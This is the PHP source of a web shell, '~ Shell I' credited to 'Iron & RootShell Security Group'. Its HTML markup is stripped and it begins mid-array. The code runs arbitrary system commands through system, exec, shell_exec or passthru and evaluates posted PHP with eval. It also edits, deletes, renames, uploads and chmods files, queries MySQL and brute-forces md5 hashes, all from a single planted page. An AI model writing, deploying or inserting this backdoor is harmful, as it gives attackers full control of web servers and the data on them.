'Execute Command', 'eval' => 'Evaluate PHP', 'mysql' => 'MySQL Query', 'chmod' => 'Chmod File', 'phpinfo' => 'PHPinfo', 'md5' => 'md5 cracker', 'headers' => 'Show headers', 'logout' => 'Log out' ); //The header, like it? $header = ' '.getenv("HTTP_HOST").' ~ Shell I
'; print $header; $footer = '

© Iron & RootShell Security Group
'; // //Page handling // if(isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Run command print "
Command:
"; if(isset($_REQUEST['command'])) { print "
";
                        execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
                    }
            break;
            
            
            case 'edit': //Edit a fie
                if(isset($_POST['editform']))
                {
                    $f = $_GET['file'];
                    $fh = fopen($f, 'w') or print "Error while opening file!";
                    fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
                    fclose($fh);
                }
                print "Editing file ".$_GET['file']." (".perm($_GET['file']).")

"; break; case 'delete': //Delete a file if(isset($_POST['yes'])) { if(unlink($_GET['file'])) { print "File deleted successfully."; } else { print "Couldn't delete file."; } } if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) { print "Are you sure you want to delete ".$_GET['file']."?
"; } break; case 'eval': //Evaluate PHP code print "
"; if(isset($_POST['eval'])) { print "

Output:

"; print "
"; eval($_POST['eval']); } break; case 'chmod': //Chmod file print "

Under construction!

"; if(isset($_POST['chmod'])) { switch ($_POST['chvalue']){ case 777: chmod($_POST['chmod'],0777); break; case 644: chmod($_POST['chmod'],0644); break; case 755: chmod($_POST['chmod'],0755); break; } print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; } if(isset($_GET['file'])) { $content = urldecode($_GET['file']); } else { $content = "file/path/please"; } print "
File to chmod:
New permission: "; break; case 'mysql': //MySQL Query if(isset($_POST['host'])) { $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); mysql_select_db($_POST['dbase']); $sql = $_POST['query']; $result = mysql_query($sql); } else { print " This only queries the database, doesn't return data!
Host:

Username:

Password:

Database:

Query:
"; } break; case 'createdir': if(mkdir($_GET['crdir'])) { print 'Directory created successfully.'; } else { print 'Couldn\'t create directory'; } break; case 'phpinfo': //PHP Info phpinfo(); break; case 'rename': if(isset($_POST['fileold'])) { if(rename($_POST['fileold'],$_POST['filenew'])) { print "File renamed."; } else { print "Couldn't rename file."; } } if(isset($_GET['file'])) { $file = basename(htmlspecialchars($_GET['file'])); } else { $file = ""; } print "Renaming ".$file." in folder ".realpath('.').".
Rename:

To:

"; break; case 'md5': if(isset($_POST['md5'])) { if(!is_numeric($_POST['timelimit'])) { $_POST['timelimit'] = 30; } set_time_limit($_POST['timelimit']); if(strlen($_POST['md5']) == 32) { if($_POST['chars'] == "9999") { $i = 0; while($_POST['md5'] != md5($i) && $i != 100000) { $i++; } } else { for($i = "a"; $i != "zzzzz"; $i++) { if(md5($i == $_POST['md5'])) { break; } } } if(md5($i) == $_POST['md5']) { print "

Plaintext of ". $_POST['md5']. " is ".$i."



"; } } } print "Will bruteforce the md5
md5 to crack:

Characters:
Max. cracking time*:


*: if set_time_limit is allowed by php.ini"; break; case 'headers': foreach(getallheaders() as $header => $value) { print htmlspecialchars($header . ":" . $value)."
"; } break; } } else //Default page that will be shown when the page isn't found or no page is selected. { $files = array(); $directories = array(); if(isset($_FILES['uploadedfile']['name'])) { $target_path = realpath('.').'/'; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { print "File:". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "File upload failed!"; } } print ""; if ($handle = opendir('.')) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $directories[] = $file; } else { $files[] = $file; } } asort($directories); asort($files); foreach($directories as $file) { print ""; } foreach($files as $file) { print ""; } } else { print "Error! Can't open ".realpath('.')."!
"; } print "
OptionsFilenameSizePermissionsLast modified
[R][D]".$file."".perm($file)."".date ("Y/m/d, H:i:s", filemtime($file))."
[R][D]".$file."".filesize($file)."".perm($file)."".date ("Y/m/d, H:i:s", filemtime($file))."

Upload file
Change Directory
Create file
Create directory
"; } function login() { print "
Password?
"; } function reload() { header("Location: ".basename(__FILE__)); } function get_execution_method() { if(function_exists('passthru')){ $m = "passthru"; } if(function_exists('exec')){ $m = "exec"; } if(function_exists('shell_exec')){ $m = "shell_ exec"; } if(function_exists('system')){ $m = "system"; } if(!isset($m)) //No method found :-| { $m = "Disabled"; } return($m); } function execute_command($method,$command) { if($method == "passthru") { passthru($command); } elseif($method == "exec") { exec($command,$result); foreach($result as $output) { print $output."
"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } function perm($file) { if(file_exists($file)) { return substr(sprintf('%o', fileperms($file)), -4); } else { return "????"; } } function get_color($file) { if(is_writable($file)) { return "green";} if(!is_writable($file) && is_readable($file)) { return "white";} if(!is_writable($file) && !is_readable($file)) { return "red";} } function show_dirs($where) { if(ereg("^c:",realpath($where))) { $dirparts = explode('\\',realpath($where)); } else { $dirparts = explode('/',realpath($where)); } $i = 0; $total = ""; foreach($dirparts as $part) { $p = 0; $pre = ""; while($p != $i) { $pre .= $dirparts[$p]."/"; $p++; } $total .= "".$part."/"; $i++; } return "

".$total."


"; } print $footer; // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) exit(); ?>